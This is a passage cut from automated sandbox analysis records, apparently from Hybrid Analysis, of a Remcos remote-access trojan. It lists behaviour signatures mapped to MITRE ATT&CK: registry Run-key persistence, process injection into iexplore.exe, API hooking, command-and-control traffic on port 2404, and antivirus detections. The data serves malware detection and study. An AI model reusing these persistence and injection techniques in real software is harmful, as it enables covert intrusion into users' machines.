{"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"file.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00005804)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-62", "type": 7, "relevance": 1, "name": "Communicates with HTTP webserver (GET/POST requests)", "description": "Found http requests in header \"GET /json.gp\"", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "network-60", "type": 7, "relevance": 1, "name": "HTTP requests contain Base64 strings", "description": "Contains base64 string in header \"netCache\" in header \"GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache\"", "origin": "Network Traffic", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"file.exe\" opened \"\\Device\\KsecDD\"\n \"remcos.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"file.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"file.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"file.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"file.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"file.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LANMANWORKSTATION\\PARAMETERS\"; Key: \"RPCCACHETIMEOUT\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"file.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"\n \"file.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"file.exe\" reads file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\desktop.ini\"\n \"file.exe\" reads file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini\"\n \"file.exe\" reads file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\desktop.ini\"\n \"file.exe\" reads file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"file.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"file.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"RMC-Y7B4RN\"; Value: \"\"%ALLUSERSPROFILE%\\tst\\remcos.exe\"\")\n \"file.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"file.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"RMC-Y7B4RN\"; Value: \"\"%ALLUSERSPROFILE%\\tst\\remcos.exe\"\")\n \"remcos.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"remcos.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"RMC-Y7B4RN\"; Value: \"\"%ALLUSERSPROFILE%\\tst\\remcos.exe\"\")\n \"remcos.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"remcos.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"RMC-Y7B4RN\"; Value: \"\"%ALLUSERSPROFILE%\\tst\\remcos.exe\"\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"remcos.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"DISMHOST.EXE.6712E6A3.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"remcos.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%ALLUSERSPROFILE%\\tst\\remcos.exe]- [targetUID: 00000000-00005804]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "section contains high entropy", "description": "\"file.exe\" has section name .text with entropy \"6.62739369218\"\n \"file.exe\" has section name .reloc with entropy \"6.72376821809\"\n \"remcos.exe.bin\" has section name .text with entropy \"6.62739369218\"\n \"remcos.exe.bin\" has section name .reloc with entropy \"6.72376821809\"\n \"DISMHOST.EXE.6712E6A3.bin\" has section name .text with entropy \"6.11476781338\"\n \"DISMHOST.EXE.6712E6A3.bin\" has section name .data with entropy \"6.44580003198\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 80 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"file.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"file.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "External Systems", "identifier": "suricata-1", "type": 18, "relevance": 10, "name": "Detected Suricata Alert", "description": "Detected alert \"ET DYN_DNS DNS Query to DynDNS Domain *.zapto .org\" (SID: 2028703, Rev: 2, Severity: 2) categorized as \"Potentially Bad Traffic\"", "origin": "Suricata Alerts"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "target-58", "type": 9, "relevance": 10, "name": "The analysis spawned a process that was identified as malicious", "description": "16/23 Antivirus vendors marked spawned process \"remcos.exe\" (PID: 5888) as malicious (classified as \"Trojan.Remcos\" with 69% detection rate)\n 16/23 Antivirus vendors marked spawned process \"remcos.exe\" (PID: 1852) as malicious (classified as \"Trojan.Remcos\" with 69% detection rate)", "origin": "Monitored Target", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "binary-11", "type": 8, "relevance": 10, "name": "The analysis extracted a file that was identified as malicious", "description": "16/23 Antivirus vendors marked dropped file \"remcos.exe.bin\" as malicious (classified as \"Trojan.Remcos\" with 69% detection rate)\n 16/23 Antivirus vendors marked dropped file \"remcos.exe\" as malicious (classified as \"Trojan.Remcos\" with 69% detection rate)", "origin": "Binary File", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"file.exe\" wrote 32 bytes to a remote process \"C:\\ProgramData\\tst\\remcos.exe\" (Handle: 1056)\n \"file.exe\" wrote 52 bytes to a remote process \"C:\\ProgramData\\tst\\remcos.exe\" (Handle: 1056)\n \"file.exe\" wrote 4 bytes to a remote process \"C:\\ProgramData\\tst\\remcos.exe\" (Handle: 1056)\n \"remcos.exe\" wrote 32 bytes to a remote process \"C:\\Program Files\\Internet Explorer\\iexplore.exe\" (Handle: 212)\n \"remcos.exe\" wrote 52 bytes to a remote process \"C:\\Program Files\\Internet Explorer\\iexplore.exe\" (Handle: 212)\n \"remcos.exe\" wrote 4 bytes to a remote process \"C:\\Program Files\\Internet Explorer\\iexplore.exe\" (Handle: 212)\n \"remcos.exe\" wrote 32 bytes to a remote process \"C:\\Program Files\\Internet Explorer\\iexplore.exe\" (Handle: 216)\n \"remcos.exe\" wrote 52 bytes to a remote process \"C:\\Program Files\\Internet Explorer\\iexplore.exe\" (Handle: 216)\n \"remcos.exe\" wrote 4 bytes to a remote process \"C:\\Program Files\\Internet Explorer\\iexplore.exe\" (Handle: 216)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-129", "type": 6, "relevance": 10, "name": "Creates a process in suspended mode (likely for process injection)", "description": "\"remcos.exe\" called \"CreateProcessW\" with parameter \"%PROGRAMFILES%\\internet explorer\\iexplore.exe\" - (UID: 00000000-00005888)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindFirstFileW@KERNEL32.DLL\" in \"remcos.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"remcos.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"remcos.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"remcos.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"remcos.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-7", "type": 7, "relevance": 7, "name": "Uses network protocols on unusual ports", "description": "TCP traffic to <IPv4> on port 2404", "origin": "Network Traffic", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-24", "type": 7, "relevance": 6, "name": "Tries to identify its external IP address", "description": "\"geoplugin.net\"", "origin": "Network Traffic", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "suricata-2", "type": 18, "relevance": 10, "name": "Detected Suricata Alert", "description": "Detected alert \"ET MALWARE Remcos 3.x Unencrypted Checkin\" (SID: 2032776, Rev: 2, Severity: 1) categorized as \"Malware Command and Control Activity Detected\" (PUA/PUP/Adware)\n Detected alert \"ET MALWARE Remcos 3.x Unencrypted Server Response\" (SID: 2032777, Rev: 2, Severity: 1) categorized as \"Malware Command and Control Activity Detected\" (PUA/PUP/Adware)", "origin": "Suricata Alerts"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (D)", "origin": "External System"}]}
66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517
https://hybrid-analysis.com/sample/66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517
Hybrid Analysis - Remcos
{"size": 8681984, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517", "sha256": "66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517", "av_detect": 74, "vx_family": "Trojan.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 1, "total_processes": 1, "total_signatures": 227, "processes": [{"uid": "00000000-00004928", "name": "66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe", "normalized_path": "C:\\66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe", "sha256": "66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517", "av_label": "ABRisk.GCQR", "av_matched": 7, "av_total": 22}], "mitre_attcks": [{"tactic": "Resource Development", "technique": "Digital Certificates", "attck_id": "T1588.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Obtain Capabilities", "attck_id": "T1588", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588"}}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 4, "informative_identifiers_count": 15}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 5, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Office Application Startup", "attck_id": "T1137", "attck_id_wiki": "https://attack.mitre.org/techniques/T1137", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 5, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Asynchronous Procedure Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Doppelgänging", "attck_id": "T1055.013", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/013", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 7}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Asynchronous Procedure Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Doppelgänging", "attck_id": "T1055.013", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/013", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "NTFS File Attributes", "attck_id": "T1564.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/004", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Direct Volume Access", "attck_id": "T1006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1006", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", 